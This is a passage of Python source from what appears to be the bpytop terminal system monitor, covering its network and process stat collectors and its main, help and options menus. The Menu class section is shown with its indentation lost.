                    new["__swap"] = cls.disks.pop("__swap")
                    new.update(cls.disks)
                    cls.disks = new
                except Exception:
                    pass
        if cls.old_disks != list(cls.disks) or cls.old_io_disks != list(cls.disks_io_dict):
            MemBox.redraw = True
            cls.recheck_diskutil = True
            cls.old_disks = list(cls.disks)
            cls.old_io_disks = list(cls.disks_io_dict)
        cls.timestamp = time()
    @classmethod
    def _draw(cls):
        '''Delegate foreground drawing of the collected stats to MemBox.'''
        MemBox._draw_fg()
class NetCollector(Collector):
    '''Collects network stats'''
    buffer: str = NetBox.buffer
    nics: List[str] = []
    nic_i: int = 0
    nic: str = ""
    new_nic: str = ""
    nic_error: bool = False
    reset: bool = False
    graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
    graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
    #min_top: int = 10<<10
    #* Stats structure = stats[network device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
    stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
    #* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
    strings: Dict[str, Dict[str, Dict[str, str]]] = {}
    switched: bool = False
    timestamp: float = time()
    net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
    auto_min: bool = CONFIG.net_auto
    net_iface: str = CONFIG.net_iface
    sync_top: int = 0
    sync_string: str = ""
    address: str = ""
    @classmethod
    def _get_nics(cls):
        '''Get a list of all network devices sorted by highest throughput'''
        cls.nic_i = 0
        cls.nics = []
        cls.nic = ""
        io_all = {}  #* Fix: pre-initialize so a failed psutil call below can't leave io_all unbound
        try:
            io_all = psutil.net_io_counters(pernic=True)
        except Exception as e:
            if not cls.nic_error:
                cls.nic_error = True
                errlog.exception(f'{e}')
        if not io_all: return
        up_stat = psutil.net_if_stats()
        #* Keep only devices reported as up, ordered by total transferred bytes
        for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
            if nic not in up_stat or not up_stat[nic].isup:
                continue
            cls.nics.append(nic)
        if not cls.nics: cls.nics = [""]
        cls.nic = cls.nics[cls.nic_i]
        if cls.net_iface and cls.net_iface in cls.nics:
            cls.nic = cls.net_iface
            cls.nic_i = cls.nics.index(cls.nic)
    @classmethod
    def switch(cls, key: str):
        '''Switch to the next ("n") or previous network device and trigger a redraw.'''
        if cls.net_iface: cls.net_iface = ""
        if len(cls.nics) < 2 and cls.nic in cls.nics:
            return
        if cls.nic_i == -1:
            cls.nic_i = 0 if key == "n" else -1
        else:
            cls.nic_i += +1 if key == "n" else -1
        cls.nic_i %= len(cls.nics)
        cls.new_nic = cls.nics[cls.nic_i]
        cls.switched = True
        Collector.collect(NetCollector, redraw=True)
    @classmethod
    def _collect(cls):
        '''Collect transfer totals and per-update speeds for the selected network device.'''
        speed: int
        stat: Dict
        up_stat = psutil.net_if_stats()
        if sorted(cls.nics) != sorted(nic for nic in up_stat if up_stat[nic].isup):
            #* Set of up devices changed; refresh the list but try to keep the current selection
            old_nic = cls.nic
            cls._get_nics()
            cls.nic = old_nic
            if cls.nic not in cls.nics:
                cls.nic_i = -1
            else:
                cls.nic_i = cls.nics.index(cls.nic)
        if cls.switched:
            cls.nic = cls.new_nic
            cls.switched = False
        if not cls.nic or cls.nic not in up_stat:
            cls._get_nics()
            if not cls.nic: return
        try:
            io_all = psutil.net_io_counters(pernic=True)[cls.nic]
        except KeyError:
            #* Fix: abort only when the selected nic is missing from the counters;
            #* the return was previously outside the handler, making everything below dead code
            return
        if not cls.nic in cls.stats:
            #* First sample for this device, initialize stats and string buffers
            cls.stats[cls.nic] = {}
            cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
            for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
                cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
                for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
                    cls.strings[cls.nic][direction][v] = ""
        cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
        cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
        if cls.nic in psutil.net_if_addrs():
            cls.address = getattr(psutil.net_if_addrs()[cls.nic][0], "address", "")
        for direction in ["download", "upload"]:
            stat = cls.stats[cls.nic][direction]
            strings = cls.strings[cls.nic][direction]
            #* Calculate current speed
            stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
            stat["last"] = stat["total"]
            speed = stat["speed"][-1]
            if cls.net_min[direction] == -1:
                #* One-time init of the graph scale from the configured minimum
                cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
                stat["graph_top"] = cls.net_min[direction]
                stat["graph_lower"] = 7
                if not cls.auto_min:
                    stat["redraw"] = True
                    strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
            if stat["offset"] and stat["offset"] > stat["total"]:
                #* Counter wrapped below the stored offset (device reset), force a totals reset
                cls.reset = True
            if cls.reset:
                if not stat["offset"]:
                    stat["offset"] = stat["total"]
                else:
                    stat["offset"] = 0
                if direction == "upload":
                    cls.reset = False
                    NetBox.redraw = True
            if len(stat["speed"]) > NetBox.width * 2:
                del stat["speed"][0]
            strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
            strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
            strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
            if speed > stat["top"] or not stat["top"]:
                stat["top"] = speed
                strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
            if cls.auto_min:
                #* Auto-scale: rescale the graph top after 5 consecutive over- or under-shoots
                if speed > stat["graph_top"]:
                    stat["graph_raise"] += 1
                    if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
                elif speed < stat["graph_top"] // 10:
                    stat["graph_lower"] += 1
                    if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
                if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
                    if stat["graph_raise"] >= 5:
                        stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
                    elif stat["graph_lower"] >= 5:
                        stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
                    stat["graph_raise"] = 0
                    stat["graph_lower"] = 0
                    stat["redraw"] = True
                    strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
        cls.timestamp = time()
        if CONFIG.net_sync:
            #* Synced mode: both graphs share the larger of the two scales
            c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
            if c_max != cls.sync_top:
                cls.sync_top = c_max
                cls.sync_string = floating_humanizer(cls.sync_top, short=True)
                NetBox.redraw = True
    @classmethod
    def _draw(cls):
        '''Delegate foreground drawing of the collected stats to NetBox.'''
        NetBox._draw_fg()
class ProcCollector(Collector):
    '''Collects process stats'''
    buffer: str = ProcBox.buffer
    search_filter: str = ""
    case_sensitive: bool = False
    processes: Dict = {}
    num_procs: int = 0
    det_cpu: float = 0.0
    detailed: bool = False
    detailed_pid: Union[int, None] = None
    details: Dict[str, Any] = {}
    details_cpu: List[int] = []
    details_mem: List[int] = []
    expand: int = 0
    collapsed: Dict = {}
    tree_counter: int = 0
    p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
    #* Pre-compiled sort key expressions, evaluated with eval() against each process "p";
    #* the 0.0 comparisons guard against psutil's ad_value (see err in _collect)
    sort_expr: Dict = {}
    sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
    sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
    sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
    sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
    sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
    sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
    sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
    sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
    @classmethod
    def _collect(cls):
        '''List all processess with pid, name, arguments, threads, username, memory percent and cpu percent'''
        if not "proc" in Box.boxes: return
        out: Dict = {}
        cls.det_cpu = 0.0
        sorting: str = CONFIG.proc_sorting
        reverse: bool = not CONFIG.proc_reversed
        proc_per_cpu: bool = CONFIG.proc_per_core
        search: List[str] = []
        if cls.search_filter:
            #* Filter is a comma separated list of search terms
            if cls.case_sensitive:
                search = [i.strip() for i in cls.search_filter.split(",")]
            else:
                search = [i.strip() for i in cls.search_filter.lower().split(",")]
        #* err doubles as psutil's ad_value: attributes that couldn't be read come back as 0.0
        err: float = 0.0
        n: int = 0
        if CONFIG.proc_tree and sorting == "arguments":
            #* "arguments" sorting is not available in tree view, fall back to "program"
            sorting = "program"
        sort_cmd = cls.sort_expr[sorting]
        if CONFIG.proc_tree:
            cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
        else:
            for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
                if cls.collect_interrupt or cls.proc_interrupt:
                    return
                if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
                    continue
                #* Replace unreadable (ad_value) attributes with sane defaults
                if p.info["cmdline"] == err:
                    p.info["cmdline"] = ""
                if p.info["username"] == err:
                    p.info["username"] = ""
                if p.info["num_threads"] == err:
                    p.info["num_threads"] = 0
                if search:
                    if cls.detailed and p.info["pid"] == cls.detailed_pid:
                        cls.det_cpu = p.info["cpu_percent"]
                    #* for/else: skip the process unless any search term matches any of the fields
                    for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
                        if not cls.case_sensitive:
                            value = value.lower()
                        for s in search:
                            if s in value:
                                break
                        else: continue
                        break
                    else: continue
                cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
                mem = p.info["memory_percent"]
                if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
                    mem_b = p.info["memory_info"].rss
                else:
                    mem_b = 0
                cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
                out[p.info["pid"]] = {
                    "name" : p.info["name"],
                    "cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
                    "threads" : p.info["num_threads"],
                    "username" : p.info["username"],
                    "mem" : mem,
                    "mem_b" : mem_b,
                    "cpu" : cpu }
                n += 1
            cls.num_procs = n
            cls.processes = out.copy()
        if cls.detailed:
            #* How many extra detail columns fit in the current box width, capped at 5
            cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
            if cls.expand > 5: cls.expand = 5
        if cls.detailed and not cls.details.get("killed", False):
            #* Collect detailed information for the selected process
            try:
                c_pid = cls.detailed_pid
                det = psutil.Process(c_pid)
            except (psutil.NoSuchProcess, psutil.ZombieProcess):
                cls.details["killed"] = True
                cls.details["status"] = psutil.STATUS_DEAD
                ProcBox.redraw = True
            else:
                attrs: List[str] = ["status", "memory_info", "create_time"]
                if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
                if cls.expand:
                    attrs.extend(["nice", "terminal"])
                    if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
                if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
                cls.details = det.as_dict(attrs=attrs, ad_value="")
                if det.parent() != None: cls.details["parent_name"] = det.parent().name()
                else: cls.details["parent_name"] = ""
                cls.details["pid"] = c_pid
                if c_pid in cls.processes:
                    #* Reuse values already collected in the main process list
                    cls.details["name"] = cls.processes[c_pid]["name"]
                    cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
                    cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
                    cls.details["username"] = cls.processes[c_pid]["username"]
                    cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
                    cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
                else:
                    cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
                    cls.details["threads"] = f'{cls.details["num_threads"]}'
                    cls.details["cpu_percent"] = round(cls.det_cpu)
                cls.details["killed"] = False
                if SYSTEM == "MacOS":
                    cls.details["cpu_num"] = -1
                    cls.details["io_counters"] = ""
                if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
                else: cls.details["memory_bytes"] = "? Bytes"
                if isinstance(cls.details["create_time"], float):
                    uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
                    if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
                    else: cls.details["uptime"] = f'{uptime}'
                else: cls.details["uptime"] = "??:??:??"
                if cls.expand:
                    if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
                    if SYSTEM == "BSD":
                        #* BSD io_counters only expose read/write call counts, not bytes
                        if cls.expand > 2:
                            if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
                            else: cls.details["io_read"] = "?"
                        if cls.expand > 3:
                            if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
                            else: cls.details["io_write"] = "?"
                    else:
                        if cls.expand > 2:
                            if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
                            else: cls.details["io_read"] = "?"
                        if cls.expand > 3:
                            if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
                            else: cls.details["io_write"] = "?"
                    if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
            cls.details_cpu.append(cls.details["cpu_percent"])
            #* Scale low memory percentages up so the mini graph stays visible
            mem = cls.details["memory_percent"]
            if mem > 80: mem = round(mem)
            elif mem > 60: mem = round(mem * 1.2)
            elif mem > 30: mem = round(mem * 1.5)
            elif mem > 10: mem = round(mem * 2)
            elif mem > 5: mem = round(mem * 10)
            else: mem = round(mem * 20)
            cls.details_mem.append(mem)
            if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
            if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
    @classmethod
    def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: List[str]):
        '''List all processess in a tree view with pid, name, threads, username, memory percent and cpu percent'''
        out: Dict = {}
        err: float = 0.0
        det_cpu: float = 0.0
        infolist: Dict = {}
        cls.tree_counter += 1
        tree = defaultdict(list)
        n: int = 0
        #* Build a ppid -> [child pids] mapping, keeping each process info for later lookup
        for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
            if cls.collect_interrupt: return
            try:
                tree[p.ppid()].append(p.pid)
            except (psutil.NoSuchProcess, psutil.ZombieProcess):
                pass
            else:
                infolist[p.pid] = p.info
                n += 1
        if 0 in tree and 0 in tree[0]:
            tree[0].remove(0)
        def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
            '''Recursively build "out" from the pid tree; collapsed subtrees are summed into their collapse_to ancestor.'''
            nonlocal infolist, proc_per_cpu, search, out, det_cpu
            name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
            cont: bool = True
            getinfo: Dict = {}
            if cls.collect_interrupt: return
            try:
                name = psutil.Process(pid).name()
                if name == "idle": return
            except psutil.Error:
                #* Process vanished; still recurse into children but don't emit an entry
                pass
                cont = False
                name = ""
            if pid in infolist:
                getinfo = infolist[pid]
            if search and not found:
                if cls.detailed and pid == cls.detailed_pid:
                    det_cpu = getinfo["cpu_percent"]
                if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
                if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
                #* for/else: suppress this entry unless any search term matches any field
                for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
                    if not cls.case_sensitive:
                        value = value.lower()
                    for s in search:
                        if s in value:
                            found = True
                            break
                    else: continue
                    break
                else: cont = False
            if cont:
                if getinfo:
                    if getinfo["num_threads"] == err: threads = 0
                    else: threads = getinfo["num_threads"]
                    if getinfo["username"] == err: username = ""
                    else: username = getinfo["username"]
                    cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
                    mem = getinfo["memory_percent"]
                    if getinfo["cmdline"] == err: cmd = ""
                    else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
                    if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
                        mem_b = getinfo["memory_info"].rss
                    else:
                        mem_b = 0
                else:
                    #* NOTE(review): cmd is not set on this path; out[pid] below would reference it
                    #* unbound if getinfo is empty while cont is True — confirm this path is unreachable
                    threads = mem_b = 0
                    username = ""
                    mem = cpu = 0.0
                if pid in cls.collapsed:
                    collapse = cls.collapsed[pid]
                else:
                    collapse = depth > CONFIG.tree_depth
                    cls.collapsed[pid] = collapse
                if collapse_to and not search:
                    #* Inside a collapsed subtree: accumulate totals onto the collapsed ancestor
                    out[collapse_to]["threads"] += threads
                    out[collapse_to]["mem"] += mem
                    out[collapse_to]["mem_b"] += mem_b
                    out[collapse_to]["cpu"] += cpu
                else:
                    if pid in tree and len(tree[pid]) > 0:
                        #* Has children: swap the branch glyph for a [+]/[-] expander
                        sign: str = "+" if collapse else "-"
                        inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
                    out[pid] = {
                        "indent" : inindent,
                        "name": name,
                        "cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
                        "threads" : threads,
                        "username" : username,
                        "mem" : mem,
                        "mem_b" : mem_b,
                        "cpu" : cpu,
                        "depth" : depth,
                }
            if search: collapse = False
            elif collapse and not collapse_to:
                collapse_to = pid
            if pid not in tree:
                return
            #* Recurse: all children but the last get a "├─" branch, the last gets "└─"
            children = tree[pid][:-1]
            for child in children:
                create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
            create_tree(tree[pid][-1], tree, indent + "  ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
        create_tree(min(tree), tree)
        cls.det_cpu = det_cpu
        if cls.collect_interrupt: return
        if cls.tree_counter >= 100:
            #* Every 100 runs, drop collapse state for pids that no longer exist
            cls.tree_counter = 0
            for pid in list(cls.collapsed):
                if not psutil.pid_exists(pid):
                    del cls.collapsed[pid]
        cls.num_procs = len(out)
        cls.processes = out.copy()
    @classmethod
    def sorting(cls, key: str):
        '''Cycle the process sorting column; "right"/"l" moves forward, anything else backward.'''
        index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key in ["right", "l"] else -1)
        if index >= len(CONFIG.sorting_options): index = 0
        elif index < 0: index = len(CONFIG.sorting_options) - 1
        CONFIG.proc_sorting = CONFIG.sorting_options[index]
        if "left" in Key.mouse: del Key.mouse["left"]
        Collector.collect(ProcCollector, interrupt=True, redraw=True)
    @classmethod
    def _draw(cls):
        '''Delegate foreground drawing of the collected stats to ProcBox.'''
        ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Cycle view presets, order: full->proc->stat->user.",
"(1)" : "Toggle CPU box.",
"(2)" : "Toggle MEM box.",
"(3)" : "Toggle NET box.",
"(4)" : "Toggle PROC box.",
"(d)" : "Toggle disks view in MEM box.",
"(F2, o)" : "Shows options.",
"(F1, shift+h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up, k) (Down, j)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left, h) (Right, l)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(s)" : "Toggle showing swap as a disk.",
"(i)" : "Toggle disks io mode with big graphs.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a NON case-sensitive process filter.",
"(shift+f)" : "Input a case-sensitive process filter.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (shift+t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (shift+k)" : "Kill selected process with SIGKILL - 9.",
"Selected (shift+i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "H", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
    """Draw and run the interactive options (setup) menu.

    Blocks in its own event loop until closed; reads and writes CONFIG
    attributes directly and triggers redraws/collection as settings change.
    Requires a terminal of at least 80x24.
    """
    if Term.width < 80 or Term.height < 24:
        errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
        return
    out: str = ""
    out_misc : str = ""
    redraw: bool = True
    selected_cat: str = ""
    selected_int: int = 0
    option_items: Dict[str, List[str]] = {}
    cat_list: List[str] = []
    cat_int: int = 0
    change_cat: bool = False
    key: str = ""
    skip: bool = False
    main_active: bool = cls.active
    cls.active = True
    cls.resized = True
    d_quote: str
    inputting: bool = False
    input_val: str = ""
    Theme.refresh()
    # Dimmed snapshot of the current screen used as the menu backdrop.
    if not cls.background:
        cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
    # Option name -> help text lines, grouped per category tab.
    categories: Dict[str, Dict[str, List[str]]] = {
        "system" : {
            "color_theme" : [
                'Set color theme.',
                '',
                'Choose from all theme files in',
                '"/usr/[local/]share/bpytop/themes" and',
                '"~/.config/bpytop/themes".',
                '',
                '"Default" for builtin default theme.',
